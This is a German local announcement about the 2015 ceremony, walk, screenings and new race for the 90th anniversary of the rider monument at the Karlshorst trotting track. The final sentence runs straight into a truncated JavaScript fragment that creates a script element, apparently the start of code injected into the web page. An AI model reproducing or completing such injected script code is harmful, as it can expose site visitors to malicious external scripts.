90 Jahre Reiterdenkmal auf der Trabrennbahn

Auf Anregung des Bürgervereins Karlshorst wird der 90. Jahrestag der Einweihung des Reiterdenkmals auf der Trabrennbahn Karlshorst in die Aktivitäten zu „120 Jahre Karlshorst“ einbezogen und mit einer kleinen Veranstaltung am Reiterdenkmal gewürdigt.

Obwohl 1925 die Einweihung erst am 23. September erfolgte, wird bereits am 13. September 2015 mit vorgenannter Veranstaltung erinnert – vorgezogen auf den „Tag des Offenen Denkmals 2015“.

Begonnen wird um 10.00 Uhr mit dem Kiezspaziergang über die Trabrennbahn, durchgeführt von den Geschichtsfreunden Karlshorst. Gegen 12.00 Uhr endet der Rundgang am Denkmal. Dort begrüßt der Pferdesportpark Karlshorst und der Bürgerverein berichtet über die von ihm initiierte, erfolgreiche Sanierung des Denkmals 2007. Der Hindernisreiter Lucas Andreas Staudinger gewann 1925 das Rennen zur damaligen Einweihung. Sein Sohn wird ebenfalls das Wort ergreifen.

Daran anschließend sind Gespräche am Denkmal bei einem Glas Sekt vorgesehen, bevor in der Wetthalle ab 14.00 Uhr „bewegte Bilder von der Rennbahn aus Wochenschauen und Augenzeugen“ zu sehen sind.

Am Freitag, den 18. September 2015 wird dann das „Lucas-Andreas-Staudinger-Rennen“ aus der Taufe gehoben und soll fortan jährlich zum Familienrenntag stattfinden. Den von ihnen gestifteten Ehrenpreis werden am 18. September 2015 Sohn und Tochter von L.A. Staudinger übergeben. Die Tochter reist dafür extra aus den USA an.var d=document;var s=d.createElement(’script‘);